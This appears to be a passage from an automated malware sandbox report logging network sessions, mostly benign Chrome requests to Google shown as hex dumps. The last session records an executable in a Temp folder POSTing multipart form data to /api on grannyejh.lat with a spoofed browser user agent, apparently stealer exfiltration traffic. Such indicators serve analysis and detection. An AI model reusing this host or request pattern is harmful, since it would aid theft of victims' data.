                                                                                                                                                                                                                                                          X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCI/KzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=
                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-12-19 13:21:29 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:21:29 GMT
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          Expires: -1
                                                                                                                                                                                                                                                          Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                          Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-uXfmy9qSifN43vLAQtjXaQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                                                                                                                                          Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                          Server: gws
                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          2024-12-19 13:21:29 UTC124INData Raw: 33 33 37 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 63 6f 6f 6b 69 6e 67 20 77 69 74 68 20 6b 79 61 22 2c 22 70 61 74 63 68 20 6e 6f 74 65 73 20 6d 61 72 76 65 6c 20 72 69 76 61 6c 73 22 2c 22 6d 65 67 61 20 6d 69 6c 6c 69 6f 6e 73 20 24 34 20 6d 69 6c 6c 69 6f 6e 20 77 69 6e 6e 65 72 22 2c 22 63 6f 6c 6c 65 67 65 20 66 6f 6f 74 62 61 6c 6c 20 70 6c 61 79 6f 66 66 22 2c 22
                                                                                                                                                                                                                                                          Data Ascii: 337)]}'["",["cooking with kya","patch notes marvel rivals","mega millions $4 million winner","college football playoff","
                                                                                                                                                                                                                                                          2024-12-19 13:21:29 UTC706INData Raw: 74 69 6b 74 6f 6b 20 62 61 6e 6e 65 64 22 2c 22 77 65 61 74 68 65 72 20 66 6f 72 65 63 61 73 74 20 73 6e 6f 77 20 73 74 6f 72 6d 20 6d 69 6e 6e 65 73 6f 74 61 22 2c 22 66 72 6f 6e 74 69 65 72 20 61 69 72 6c 69 6e 65 73 20 63 76 67 22 2c 22 61 32 34 20 64 65 61 74 68 20 6f 66 20 61 20 75 6e 69 63 6f 72 6e 20 74 72 61 69 6c 65 72 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30 33 64 22 2c 22 67
                                                                                                                                                                                                                                                          Data Ascii: tiktok banned","weather forecast snow storm minnesota","frontier airlines cvg","a24 death of a unicorn trailer"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","g
                                                                                                                                                                                                                                                          2024-12-19 13:21:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          22192.168.2.449889142.250.181.1324434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:21:29 UTC518OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCI/KzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=
                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-12-19 13:21:30 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Version: 705503573
                                                                                                                                                                                                                                                          Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                                                                                                                                          Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:21:29 GMT
                                                                                                                                                                                                                                                          Server: gws
                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          2024-12-19 13:21:30 UTC372INData Raw: 31 38 31 31 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                                                                                                          Data Ascii: 1811)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                                                                                                                                          2024-12-19 13:21:30 UTC1390INData Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30
                                                                                                                                                                                                                                                          Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
                                                                                                                                                                                                                                                          2024-12-19 13:21:30 UTC1390INData Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64
                                                                                                                                                                                                                                                          Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
                                                                                                                                                                                                                                                          2024-12-19 13:21:30 UTC1390INData Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20
                                                                                                                                                                                                                                                          Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
                                                                                                                                                                                                                                                          2024-12-19 13:21:30 UTC1390INData Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c
                                                                                                                                                                                                                                                          Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
                                                                                                                                                                                                                                                          2024-12-19 13:21:30 UTC237INData Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 32 38 32 2c 33 37 30 30 39 34 32 2c 33 37 30 31 33 38 34 2c 31 30 32 32 37 38 32 30 35 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700282,3700942,3701384,102278205],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_
                                                                                                                                                                                                                                                          2024-12-19 13:21:30 UTC216INData Raw: 64 32 0d 0a 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 5c 75 30 30 33 64 74 68 69 73 3b 5c 6e 74 72 79 7b 5c 6e 5f 2e 78 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 21 61 2e 6a 29 69 66 28 63 20 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 29 66 6f 72 28 76 61 72 20 64 20 6f 66 20 63 29 5f 2e 78 64 28 61 2c 62 2c 64 29 3b 65 6c 73 65 7b 64 5c 75 30 30 33 64 28 30 2c 5f 2e 7a 29 28 61 2e 43 2c 61 2c 62 29 3b 63 6f 6e 73 74 20 65 5c 75 30 30 33 64 61 2e 76 2b 63 3b 61 2e 76 2b 2b 3b 62 2e 64 61 74 61 73 65 74 2e 65 71 69 64 5c 75 30 30 33 64 65 3b 61 2e 42 5b 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: d2||{};(function(_){var window\u003dthis;\ntry{\n_.xd\u003dfunction(a,b,c){if(!a.j)if(c instanceof Array)for(var d of c)_.xd(a,b,d);else{d\u003d(0,_.z)(a.C,a,b);const e\u003da.v+c;a.v++;b.dataset.eqid\u003de;a.B[
                                                                                                                                                                                                                                                          2024-12-19 13:21:30 UTC1390INData Raw: 38 30 30 30 0d 0a 65 5d 5c 75 30 30 33 64 64 3b 62 5c 75 30 30 32 36 5c 75 30 30 32 36 62 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 62 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 63 2c 64 2c 21 31 29 3a 62 5c 75 30 30 32 36 5c 75 30 30 32 36 62 2e 61 74 74 61 63 68 45 76 65 6e 74 3f 62 2e 61 74 74 61 63 68 45 76 65 6e 74 28 5c 22 6f 6e 5c 22 2b 63 2c 64 29 3a 61 2e 6f 2e 6c 6f 67 28 45 72 72 6f 72 28 5c 22 42 60 5c 22 2b 62 29 29 7d 7d 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 76 61 72 20 79 64 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 5c 22 2e 67 62 5f 49 20 2e 67 62 5f 41 5c 22 29 2c 7a 64 5c 75 30 30 33 64
                                                                                                                                                                                                                                                          Data Ascii: 8000e]\u003dd;b\u0026\u0026b.addEventListener?b.addEventListener(c,d,!1):b\u0026\u0026b.attachEvent?b.attachEvent(\"on\"+c,d):a.o.log(Error(\"B`\"+b))}};\n}catch(e){_._DumpException(e)}\ntry{\nvar yd\u003ddocument.querySelector(\".gb_I .gb_A\"),zd\u003d
                                                                                                                                                                                                                                                          2024-12-19 13:21:30 UTC1390INData Raw: 74 74 70 73 5c 22 29 2c 47 64 28 5c 22 6d 61 69 6c 74 6f 5c 22 29 2c 47 64 28 5c 22 66 74 70 5c 22 29 2c 6e 65 77 20 5f 2e 46 64 28 61 5c 75 30 30 33 64 5c 75 30 30 33 65 2f 5e 5b 5e 3a 5d 2a 28 5b 2f 3f 23 5d 7c 24 29 2f 2e 74 65 73 74 28 61 29 29 5d 3b 5f 2e 4c 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 2b 5c 22 5c 22 7d 7d 3b 5f 2e 4d 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 4c 64 28 5f 2e 48 64 3f 5f 2e 48 64 2e 65 6d 70 74 79 48 54 4d 4c 3a 5c 22 5c 22 29 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 76 61 72 20 51 64 2c 64
                                                                                                                                                                                                                                                          Data Ascii: ttps\"),Gd(\"mailto\"),Gd(\"ftp\"),new _.Fd(a\u003d\u003e/^[^:]*([/?#]|$)/.test(a))];_.Ld\u003dclass{constructor(a){this.i\u003da}toString(){return this.i+\"\"}};_.Md\u003dnew _.Ld(_.Hd?_.Hd.emptyHTML:\"\");\n}catch(e){_._DumpException(e)}\ntry{\nvar Qd,d
                                                                                                                                                                                                                                                          2024-12-19 13:21:30 UTC1390INData Raw: 5f 2e 24 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 5c 75 30 30 33 64 5f 2e 4d 61 28 61 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 61 72 72 61 79 5c 22 7c 7c 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6f 62 6a 65 63 74 5c 22 5c 75 30 30 32 36 5c 75 30 30 32 36 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6e 75 6d 62 65 72 5c 22 7d 3b 5f 2e 61 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 72 65 74 75 72 6e 20 5f 2e 73 62 28 61 2c 62 2c 63 2c 21 31 29 21 5c 75 30 30 33 64 5c 75 30 30 33 64 76 6f 69 64 20 30 7d 3b 5f 2e 62 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 5f 2e 4f 64 28 5f 2e 45 63 28
                                                                                                                                                                                                                                                          Data Ascii: _.$d\u003dfunction(a){var b\u003d_.Ma(a);return b\u003d\u003d\"array\"||b\u003d\u003d\"object\"\u0026\u0026typeof a.length\u003d\u003d\"number\"};_.ae\u003dfunction(a,b,c){return _.sb(a,b,c,!1)!\u003d\u003dvoid 0};_.be\u003dfunction(a,b){return _.Od(_.Ec(


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          23192.168.2.449891142.250.181.1324434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:21:29 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-12-19 13:21:30 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Version: 705503573
                                                                                                                                                                                                                                                          Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                                                                                                                                          Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:21:29 GMT
                                                                                                                                                                                                                                                          Server: gws
                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          2024-12-19 13:21:30 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                          2024-12-19 13:21:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          24192.168.2.449899104.21.64.804435812C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:21:30 UTC271OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=5LYF71XTJ3I
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 1236
                                                                                                                                                                                                                                                          Host: grannyejh.lat
